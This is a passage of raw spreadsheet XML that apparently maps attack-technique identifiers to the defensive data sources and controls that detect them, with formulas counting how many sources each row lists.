    <row r="251" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A251" s="43" t="s">
        <v>381</v>
      </c>
      <c r="B251" s="53" t="str">
        <f>LOOKUP(A251,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Netflow/Enclave netflow,File monitoring,Authentication logs</v>
      </c>
      <c r="C251" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D251" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E251" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F251" s="53"/>
      <c r="G251" s="19"/>
    </row>
    <row r="252" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A252" s="43" t="s">
        <v>382</v>
      </c>
      <c r="B252" s="53" t="str">
        <f>LOOKUP(A252,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C252" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D252" s="53">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E252" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F252" s="53"/>
      <c r="G252" s="19"/>
    </row>
    <row r="253" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A253" s="43" t="s">
        <v>383</v>
      </c>
      <c r="B253" s="53" t="str">
        <f>LOOKUP(A253,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C253" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D253" s="53">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E253" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F253" s="53"/>
      <c r="G253" s="19"/>
    </row>
    <row r="254" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A254" s="43" t="s">
        <v>384</v>
      </c>
      <c r="B254" s="53" t="str">
        <f>LOOKUP(A254,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C254" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D254" s="53">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E254" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F254" s="53"/>
      <c r="G254" s="19"/>
    </row>
    <row r="255" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A255" s="43" t="s">
        <v>385</v>
      </c>
      <c r="B255" s="53" t="str">
        <f>LOOKUP(A255,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Asset management</v>
      </c>
      <c r="C255" s="17">
        <v>100</v>
      </c>
      <c r="D255" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E255" s="53">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F255" s="53"/>
      <c r="G255" s="19"/>
    </row>
    <row r="256" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A256" s="43" t="s">
        <v>386</v>
      </c>
      <c r="B256" s="53" t="str">
        <f>LOOKUP(A256,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="C256" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D256" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E256" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F256" s="53"/>
      <c r="G256" s="19"/>
    </row>
    <row r="257" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A257" s="43" t="s">
        <v>387</v>
      </c>
      <c r="B257" s="53" t="str">
        <f>LOOKUP(A257,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="C257" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D257" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E257" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F257" s="53"/>
      <c r="G257" s="19"/>
    </row>
    <row r="258" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A258" s="43" t="s">
        <v>388</v>
      </c>
      <c r="B258" s="53" t="str">
        <f>LOOKUP(A258,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,OAuth audit logs</v>
      </c>
      <c r="C258" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D258" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E258" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F258" s="53"/>
      <c r="G258" s="19"/>
    </row>
    <row r="259" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A259" s="43" t="s">
        <v>389</v>
      </c>
      <c r="B259" s="53" t="str">
        <f>LOOKUP(A259,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C259" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D259" s="53">
        <f t="shared" ref="D259:D267" si="9">LEN(TRIM(B259))-LEN(SUBSTITUTE(TRIM(B259),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E259" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F259" s="53"/>
      <c r="G259" s="19"/>
    </row>
    <row r="260" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A260" s="43" t="s">
        <v>390</v>
      </c>
      <c r="B260" s="53" t="str">
        <f>LOOKUP(A260,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C260" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D260" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E260" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F260" s="53"/>
      <c r="G260" s="19"/>
    </row>
    <row r="261" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A261" s="43" t="s">
        <v>391</v>
      </c>
      <c r="B261" s="53" t="str">
        <f>LOOKUP(A261,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C261" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D261" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E261" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F261" s="53"/>
      <c r="G261" s="19"/>
    </row>
    <row r="262" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A262" s="43" t="s">
        <v>392</v>
      </c>
      <c r="B262" s="53" t="str">
        <f>LOOKUP(A262,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,DNS records,Anti-virus,Web proxy,File monitoring,Mail server,Office 365 trace logs</v>
      </c>
      <c r="C262" s="17" t="s">
        <v>373</v>
      </c>
      <c r="D262" s="53">
        <f t="shared" si="9"/>
        <v>7</v>
      </c>
      <c r="E262" s="53">
        <f t="shared" si="8"/>
        <v>7</v>
      </c>
      <c r="F262" s="53"/>
      <c r="G262" s="19"/>
    </row>
    <row r="263" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A263" s="43" t="s">
        <v>393</v>
      </c>
      <c r="B263" s="53" t="str">
        <f>LOOKUP(A263,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C263" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D263" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E263" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F263" s="53"/>
      <c r="G263" s="19"/>
    </row>
    <row r="264" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A264" s="43" t="s">
        <v>394</v>
      </c>
      <c r="B264" s="53" t="str">
        <f>LOOKUP(A264,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C264" s="17" t="s">
        <v>395</v>
      </c>
      <c r="D264" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E264" s="53">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F264" s="53"/>
      <c r="G264" s="19"/>
    </row>
    <row r="265" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A265" s="43" t="s">
        <v>396</v>
      </c>
      <c r="B265" s="53" t="str">
        <f>LOOKUP(A265,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C265" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D265" s="53">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E265" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F265" s="53"/>
      <c r="G265" s="19"/>
    </row>
    <row r="266" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A266" s="43" t="s">
        <v>397</v>
      </c>
      <c r="B266" s="53" t="str">
        <f>LOOKUP(A266,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="C266" s="17" t="s">
        <v>398</v>
      </c>
      <c r="D266" s="53">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E266" s="53">
        <f t="shared" ref="E266:E267" si="10">LEN(TRIM(C266))-LEN(SUBSTITUTE(TRIM(C266),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F266" s="53"/>
      <c r="G266" s="19"/>
    </row>
    <row r="267" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A267" s="43" t="s">
        <v>399</v>
      </c>
      <c r="B267" s="53" t="str">
        <f>LOOKUP(A267,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring</v>
      </c>
      <c r="C267" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D267" s="53">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E267" s="53">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="F267" s="53"/>
      <c r="G267" s="19"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="G2">
    <cfRule type="iconSet" priority="1">
      <iconSet iconSet="3Symbols2" reverse="1">
        <cfvo type="percent" val="0"/>
        <cfvo type="num" val="0" gte="0"/>
        <cfvo type="num" val="0" gte="0"/>
      </iconSet>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9"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1EB93-49D3-4570-BE84-8F26EFDC4B69}">
  <dimension ref="A1:U267"/>
  <sheetViews>
    <sheetView zoomScale="140" zoomScaleNormal="140" workbookViewId="0">
      <selection activeCell="C258" sqref="C258"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" zeroHeight="1" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="11.1640625" style="4" customWidth="1"/>
    <col min="2" max="2" width="124.83203125" style="4" customWidth="1"/>
    <col min="3" max="3" width="21" style="5" customWidth="1"/>
    <col min="4" max="4" width="15.6640625" style="4" customWidth="1"/>
    <col min="5" max="5" width="11.1640625" style="4" customWidth="1"/>
    <col min="6" max="6" width="11.1640625" style="51" customWidth="1"/>
    <col min="7" max="7" width="47.6640625" style="12" hidden="1" customWidth="1"/>
    <col min="8" max="21" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" s="3" customFormat="1" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="28" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="28" t="s">
        <v>400</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>39</v>
      </c>
      <c r="D1" s="28" t="s">
        <v>40</v>
      </c>
      <c r="E1" s="28" t="s">
        <v>41</v>
      </c>
      <c r="F1" s="48" t="s">
        <v>42</v>
      </c>
      <c r="G1" s="47" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="2" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A2" s="16" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="45" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C2" s="17">
        <v>0</v>
      </c>
      <c r="D2" s="45">
        <f>LEN(TRIM(B2))-LEN(SUBSTITUTE(TRIM(B2),",",""))+1</f>
        <v>1</v>
      </c>
      <c r="E2" s="45">
        <f t="shared" ref="E2:E8" si="0">LEN(TRIM(C2))-LEN(SUBSTITUTE(TRIM(C2),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F2" s="49"/>
      <c r="G2" s="45">
        <f>SUM(COUNTA('REF-DataSources'!A:A)-COUNTA(A:A))</f>
        <v>302</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A3" s="16" t="s">
        <v>46</v>
      </c>
      <c r="B3" s="45" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C3" s="17">
        <v>0</v>
      </c>
      <c r="D3" s="45">
        <f t="shared" ref="D3:D66" si="1">LEN(TRIM(B3))-LEN(SUBSTITUTE(TRIM(B3),",",""))+1</f>
        <v>1</v>
      </c>
      <c r="E3" s="45">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F3" s="49"/>
      <c r="G3" s="19"/>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A4" s="16" t="s">
        <v>48</v>
      </c>
      <c r="B4" s="45" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C4" s="17">
        <v>0</v>
      </c>
      <c r="D4" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E4" s="45">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F4" s="49"/>
      <c r="G4" s="19"/>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A5" s="16" t="s">
        <v>49</v>
      </c>
      <c r="B5" s="45" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C5" s="17">
        <v>0</v>
      </c>
      <c r="D5" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E5" s="45">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F5" s="49"/>
      <c r="G5" s="19"/>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A6" s="16" t="s">
        <v>51</v>
      </c>
      <c r="B6" s="45" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C6" s="17">
        <v>0</v>
      </c>
      <c r="D6" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E6" s="45">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F6" s="49"/>
      <c r="G6" s="19"/>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A7" s="16" t="s">
        <v>53</v>
      </c>
      <c r="B7" s="45" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:H)</f>
        <v>File monitoring,File system access controls</v>
      </c>
      <c r="C7" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D7" s="45">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E7" s="45">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="F7" s="50"/>
      <c r="G7" s="19"/>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A8" s="16" t="s">
        <v>54</v>
      </c>
      <c r="B8" s="45" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C8" s="17">
        <v>0</v>
      </c>
      <c r="D8" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E8" s="45">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F8" s="50"/>
      <c r="G8" s="19"/>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A9" s="16" t="s">
        <v>56</v>
      </c>
      <c r="B9" s="45" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C9" s="17">
        <v>0</v>
      </c>
      <c r="D9" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E9" s="45">
        <f>LEN(TRIM(C9))-LEN(SUBSTITUTE(TRIM(C9),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F9" s="50"/>
      <c r="G9" s="19"/>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A10" s="16" t="s">
        <v>58</v>
      </c>
      <c r="B10" s="45" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C10" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D10" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E10" s="45">
        <f t="shared" ref="E10:E73" si="2">LEN(TRIM(C10))-LEN(SUBSTITUTE(TRIM(C10),";",""))+1</f>
        <v>2</v>
      </c>
      <c r="F10" s="50"/>
      <c r="G10" s="19"/>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A11" s="16" t="s">
        <v>60</v>
      </c>
      <c r="B11" s="45" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C11" s="17">
        <v>0</v>
      </c>
      <c r="D11" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E11" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F11" s="50"/>
      <c r="G11" s="19"/>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A12" s="16" t="s">
        <v>62</v>
      </c>
      <c r="B12" s="45" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C12" s="17">
        <v>0</v>
      </c>
      <c r="D12" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E12" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F12" s="50"/>
      <c r="G12" s="19"/>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A13" s="16" t="s">
        <v>64</v>
      </c>
      <c r="B13" s="45" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C13" s="17">
        <v>0</v>
      </c>
      <c r="D13" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E13" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F13" s="50"/>
      <c r="G13" s="19"/>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A14" s="16" t="s">
        <v>66</v>
      </c>
      <c r="B14" s="45" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C14" s="17">
        <v>0</v>
      </c>
      <c r="D14" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E14" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F14" s="50"/>
      <c r="G14" s="19"/>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A15" s="16" t="s">
        <v>68</v>
      </c>
      <c r="B15" s="45" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:H)</f>
        <v>File monitoring,Host intrusion prevention systems,Application control,Signature-based detection,System access controls,Application control by file name or path,Anti-virus</v>
      </c>
      <c r="C15" s="17" t="s">
        <v>401</v>
      </c>
      <c r="D15" s="45">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="E15" s="45">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="F15" s="50"/>
      <c r="G15" s="19"/>
    </row>
    <row r="16" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A16" s="16" t="s">
        <v>70</v>
      </c>
      <c r="B16" s="45" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:H)</f>
        <v>File monitoring,Host intrusion prevention systems,Application control,Signature-based detection,System access controls,Application control by file name or path,Anti-virus</v>
      </c>
      <c r="C16" s="17">
        <v>0</v>
      </c>
      <c r="D16" s="45">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="E16" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F16" s="50"/>
      <c r="G16" s="19"/>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A17" s="16" t="s">
        <v>72</v>
      </c>
      <c r="B17" s="45" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C17" s="17">
        <v>0</v>
      </c>
      <c r="D17" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E17" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F17" s="50"/>
      <c r="G17" s="19"/>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A18" s="16" t="s">
        <v>73</v>
      </c>
      <c r="B18" s="45" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C18" s="17">
        <v>0</v>
      </c>
      <c r="D18" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E18" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F18" s="50"/>
      <c r="G18" s="19"/>
    </row>
    <row r="19" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A19" s="16" t="s">
        <v>75</v>
      </c>
      <c r="B19" s="45" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C19" s="17">
        <v>0</v>
      </c>
      <c r="D19" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E19" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F19" s="50"/>
      <c r="G19" s="19"/>
    </row>
    <row r="20" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A20" s="16" t="s">
        <v>77</v>
      </c>
      <c r="B20" s="45" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C20" s="17">
        <v>0</v>
      </c>
      <c r="D20" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E20" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F20" s="50"/>
      <c r="G20" s="19"/>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A21" s="16" t="s">
        <v>79</v>
      </c>
      <c r="B21" s="45" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C21" s="17">
        <v>0</v>
      </c>
      <c r="D21" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E21" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F21" s="50"/>
      <c r="G21" s="19"/>
    </row>
    <row r="22" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A22" s="16" t="s">
        <v>80</v>
      </c>
      <c r="B22" s="45" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C22" s="17">
        <v>0</v>
      </c>
      <c r="D22" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E22" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F22" s="50"/>
      <c r="G22" s="19"/>
    </row>
    <row r="23" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A23" s="16" t="s">
        <v>81</v>
      </c>
      <c r="B23" s="45" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C23" s="17">
        <v>0</v>
      </c>
      <c r="D23" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E23" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F23" s="50"/>
      <c r="G23" s="19"/>
    </row>
    <row r="24" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A24" s="16" t="s">
        <v>83</v>
      </c>
      <c r="B24" s="45" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C24" s="17">
        <v>0</v>
      </c>
      <c r="D24" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E24" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F24" s="50"/>
      <c r="G24" s="19"/>
    </row>
    <row r="25" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A25" s="16" t="s">
        <v>84</v>
      </c>
      <c r="B25" s="45" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C25" s="17">
        <v>0</v>
      </c>
      <c r="D25" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E25" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F25" s="50"/>
      <c r="G25" s="19"/>
    </row>
    <row r="26" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A26" s="16" t="s">
        <v>85</v>
      </c>
      <c r="B26" s="45" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C26" s="17">
        <v>0</v>
      </c>
      <c r="D26" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E26" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F26" s="50"/>
      <c r="G26" s="19"/>
    </row>
    <row r="27" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A27" s="16" t="s">
        <v>86</v>
      </c>
      <c r="B27" s="45" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C27" s="17">
        <v>0</v>
      </c>
      <c r="D27" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E27" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F27" s="50"/>
      <c r="G27" s="19"/>
    </row>
    <row r="28" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A28" s="16" t="s">
        <v>87</v>
      </c>
      <c r="B28" s="45" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:H)</f>
        <v>Host forensic analysis,Signature-based detection,Host intrusion prevention systems,Application control,Log analysis,Application control by file name or path</v>
      </c>
      <c r="C28" s="17" t="s">
        <v>402</v>
      </c>
      <c r="D28" s="45">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="E28" s="45">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="F28" s="50"/>
      <c r="G28" s="19"/>
    </row>
    <row r="29" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A29" s="16" t="s">
        <v>89</v>
      </c>
      <c r="B29" s="45" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host intrusion prevention systems,Log analysis,Signature-based detection</v>
      </c>
      <c r="C29" s="17">
        <v>0</v>
      </c>
      <c r="D29" s="45">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E29" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F29" s="50"/>
      <c r="G29" s="19"/>
    </row>
    <row r="30" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A30" s="16" t="s">
        <v>91</v>
      </c>
      <c r="B30" s="45" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C30" s="17">
        <v>0</v>
      </c>
      <c r="D30" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E30" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F30" s="50"/>
      <c r="G30" s="19"/>
    </row>
    <row r="31" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A31" s="16" t="s">
        <v>92</v>
      </c>
      <c r="B31" s="45" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C31" s="17">
        <v>0</v>
      </c>
      <c r="D31" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E31" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F31" s="50"/>
      <c r="G31" s="19"/>
    </row>
    <row r="32" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A32" s="16" t="s">
        <v>94</v>
      </c>
      <c r="B32" s="45" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C32" s="17">
        <v>0</v>
      </c>
      <c r="D32" s="45">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E32" s="45">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F32" s="50"/>
